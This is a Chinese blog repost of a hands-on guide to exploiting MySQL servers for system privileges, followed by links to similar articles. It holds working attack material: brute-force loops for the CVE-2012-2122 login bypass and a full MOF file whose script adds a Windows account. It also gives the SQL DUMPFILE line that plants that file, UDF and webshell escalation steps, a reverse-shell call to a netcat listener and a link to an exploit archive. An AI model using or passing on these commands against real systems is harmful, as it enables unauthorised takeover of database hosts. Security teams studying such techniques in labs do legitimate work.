mysql udf提权_mysql数据库漏洞利用及提权方式小结

最新推荐文章于 2024-07-01 00:39:18 发布
最新推荐文章于 2024-07-01 00:39:18 发布
阅读量694 收藏
点赞数
文章标签: mysql udf提权 mysql提权 windows c++ 服务 当前用户提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39971435/article/details/111277193
版权

转先知社区 作者:ghtwf01

CVE-2012-2122 Mysql身份认证漏洞

影响版本

Mysql5.5.24之前MariaDB也差不多这个版本之前

漏洞原理

只要知道用户名,不断尝试就能够直接登入SQL数据库,按照公告说法大约256次就能够蒙对一次

漏洞复现

msf利用

73185b935a4f89204c4778fab5ff00a2.png

hash解密

48776cda85864c770c4acf55970d1bc8.png

得到密码即可登录

f0568da38823069556faa5e674a04684.png

python exp
#!/usr/bin/pythonimport subprocesswhile 1:subprocess.Popen("mysql -u root -p -h 192.168.0.16 --password=test", shell=True).wait()

e4a5435d0f87f50cb8180266a373b832.png

shell exp
for i in `seq 1 1000`; do mysql -u root -p -h 192.168.0.16 --password=bad 2>/dev/null; done

772a34eaf53b6bed658d5e63ed5d24b8.png

Mysql UDF提权

如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下
如果mysql版本小于5.1,udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录

利用sqlmap进行UDF提权

7f44c354eeacc12cfe79835ffe16028c.png

利用msf进行UDF提权

使用mysql_udf_payload模块
适应于5.5.9以下,我这边的mysql版本号为5.5.53,已经超出了版本限制,所以不能提权

手工UDF提权

这里上传使用暗月的木马

6b080511aa1a5aaff765797b41eda984.png

这作者牛逼牛逼登录进去,它会自动判断mysql版本决定出导出dll文件位置

ce91832fc90784a8170bf427430b6368.png

然后导出udf,发现没有plugin这个目录

74a398ec62345816dbaaf95d29aa59b1.png

于是我们创建后就能成功导出

8254aa1c110cae9e71eba23e74d45487.png

但是一直找不到文件。。,最后使用其它的udf提权文件发现可以,原来是这个udf文件问题,这下便能执行命令

af39d8a6ce0fca4d76feaa125e9f216d.png

添加管理员,开启3389等。。这里就略过
既然知道了mysql账号密码当然也可以直接连接上去,然后上传文件,执行命令

Mysql MOF提权

直接上传文件MOF提权

直接上传mof.php文件登录后执行任意命令

0c6031f247327fd90ba7c72691a3ec17.png

bda0d14fa13c806dde79ac21495175b4.png

利用msf进行MOF提权

使用mysql_mof模块,有的版本不能成功,比如我现在这个phpstudy搭建的5.5.53

上传nullevt.mof文件进行MOF提权

nullevt.mof文件源码

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user ghtwf011 ghtwf01 /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

他会每五秒创建一个账户ghtwf011,里面命令可以自定义
使用sql语句将文件导入到c:/windows/system32/wbem/mof/

select load_file("C:/phpstudy/WWW/nullevt.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

注意这里不能使用outfile,因为会在末端写入新行,因此mof在被当作二进制文件无法正常执行,所以我们用dumpfile导出一行数据

ce624392c982050713722a2131cbcc64.png

成功生成了ghtwf011账户

75b2fc804108a39de1bd606892dd3328.png

因为每五秒都会生成账户,痕迹清理的时候使用如下办法即可

net stop winmgmt
net user ghtwf011 /delete
切换到c:/windows/system32/wbem后del repository
net start winmgmt

Mysql反弹端口提权

原理就是声明一个backdoor函数
exp如下,exp太长了文章发不出来。。我附件出来吧

第二条定义的@audf.dll内容的16进制
依次执行命令kali使用nc监听,这边执行select backshell("192.168.0.12",4444);

42ba5e35f11ff9ed8b24b60d9fafd6a0.png

3f41681306a446bf90aa331405b58b4c.png

成功提权拿到shell

参考链接

https://www.freebuf.com/vuls/3815.html
https://xz.aliyun.com/t/2719#toc-14

a1fd4aad75aeda3429010cbf723d10fa.pngexp.rar (0.062 MB) 下载附件

https://xzfile.aliyuncs.com/upload/affix/20200313113902-2e4ffe06-64dc-1.rar

3e954ac3a505ec206ea288ca984dfe1f.gif

weixin_39971435
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql漏洞利用提权
willow_liang的博客
04-22 2317
目录 一 、Mysql信息收集 1.使用Nmap进行mysql的信息收集 2.通过msf探测mysql信息 3.使用sqlmap进行sql注入收集mysql版本信息 二、获取mysql密码 1.使用msf模块爆破 2.nmap脚本进行爆破 3.sqlmap的sql-shell查询哈希值 4.从网站泄露的源代码中查找配置文件获取用户名密码 三、通过Mysql服务器写shell 1.利用联合注入写入shell 2.当sql注入为盲注或者报错注入时,可以使用分隔符写入shell 3.当
mysql(linux)远程数据库提权漏洞_MySQL(Linux)远程数据库提权漏洞
weixin_36050664的博客
02-07 253
小编的话:Kingcope神牛又放干货了。漏洞在12月1日的Seclist上发布,作者在Debian Lenny (mysql-5.0.51a) 、 OpenSuSE 11.4 (5.1.53-log)上测试成功,代码执行成功后会增加一个MySQL的管理员帐号。use DBI();$|=1;=for commentMySQL privilege elevation ExploitThis expl...
mysql提权漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-17 204
linux+mysql怎么提权 据我所知mysql没有管理账号这样的概念,只有不同的用户权限。默认root用户就具有所有的权限,你可以新建一个用户,使它拥有所有的权限,还可以指定从什么地方登陆。权限划分可以很细的,可以精确到table,像select这种简单的查看功能命令都可以限定。具体命令像create,grant等等...
你真的会udf提权???数据库权限到系统权限 内网学习 mysqludf提权操作 ??msf你会用了吗???
最新发布
helloKittywz的博客
07-01 830
我们的udf提权和反弹shell提权是类似的,反弹shell就是直接执行命令来建立这些操作,命令是写好了的通过编码进行操作的,也是创建dll文件。与udf提权是类似的。在实际的提权操作还有很多妨碍我们的,我们会遇见很多的,导致提权不成功的操作。mysqludf提权前提:1:要有数据库密码和账号2:secure-file-priv=空或者写入的路径各个好是我们要写的地方。
About Mysql 的那个提权漏洞
代码析构师的专栏
06-05 567
致看了一下,原来是在导出文件的时候出的问题,具体怎么出的问题,表示看mysql的源码不是我能看的来的。。 大家都知道,要对方开启mysql的外联,并且有root密码,这种情况只能用来扫肉鸡了,还蛋疼的不行。所以我感觉用在webshell下辅助提权不错,毕竟如果导udf什么相对麻烦了一些。所以就有下面的利用: 1.找个可写目录,我这里是C:\recycler\,把如下代码写到nullev
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
mysql数据库提权所需lib_mysqludf_sys_64.dll(64位)
10-03
提权必备,之后会出对应的提权教程
Linux利用UDF库实现Mysql提权
09-10
请注意,这种提权方法具有潜在的安风险,如果被恶意利用,可能导致系统安漏洞。因此,理解并妥善管理MySQLUDF功能至关重要,只有在必要且受控的环境下进行此类操作。在生产环境中,务必遵循最小权限原则,并...
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
权限提升之Mysql提权-漏洞银行大咖面对面17
07-31
权限提升之Mysql提权-漏洞银行大咖面对面17-指剑碎星河大咖
暗月mysql版本通杀提权
06-21
暗月mysql版本通杀提权
详谈利用系统漏洞及mysql提权
热门推荐
weixin_43526443的博客
01-25 7万+
提权,顾名思义就是提升权限,当我们 getshell ⼀个⽹站之后,⼤部分情况下我们的权限是⾮常低的,这时就需要利⽤提权,让原本的低权限(如只允许列⽬录)→ ⾼权限(拥有修改⽂件的能⼒),权限提升后,对接下来的渗透有很⼤帮助
MySQL 漏洞利用提权
weixin_50464560的博客
07-15 2477
转载于https://www.sqlsec.com/2020/11/mysql.html#toc-heading-1 自从接触安以来就 MySQLUDF 提权、MOF 提权耳熟能详,但是貌似国光我一直都没有单独总结过这些零散的姿势点,所以本文就诞生了,再解决自己以前的困扰之余,也希望本文可以帮助到其他网友。权限获取数据库操作权限本文讲的是 MySQL 提权相关知识,但是提权之前得先拿到高权限的 MySQL 用户才可以,拿到 MySQL用户名和密码的方式多种多样,但是不外乎就下面几种方法:MySQ
Linux提权服务漏洞,以MySQL-UDF提权为例
2401_83946570的博客
04-11 447
不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?
MySQL_UDF提权漏洞复现
wangyuxiang946的博客
07-25 21
操作系统: Windows server 2008,Web环境: IIS 7.0 + MySQL 5.5.22
实战:各数据库手工注入及漏洞提权利用基础
GitChat
08-24 509
本周总结 MySQL 数据库手工注入 Access 数据库手工注入 MSSQL 数据库手工注入 MongoDB 渗透测试与漏洞提权利用 MySQL 渗透测试与漏洞提权利用 简单归纳为上述内容,另包括在 sql 注入时为了应对各种限制措施,利用数据库自带的一些系统函数经过各种变换之后可以绕过一些安设备或者一些基础防御的措施,比如一些字符串转换的函数、截取字符串长度的函数等...
mysql 5.5.19提权_sudo本地提权漏洞(CVE-2021-3156)
weixin_35962608的博客
02-07 531
0x00漏洞概述CVE IDCVE-2021-3156时 间2021-01-27类 型权限提升等 级高危远程利用否影响范围0x01漏洞详情Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron ...
mysql udf 提权
03-06
提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高权限才能执行的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值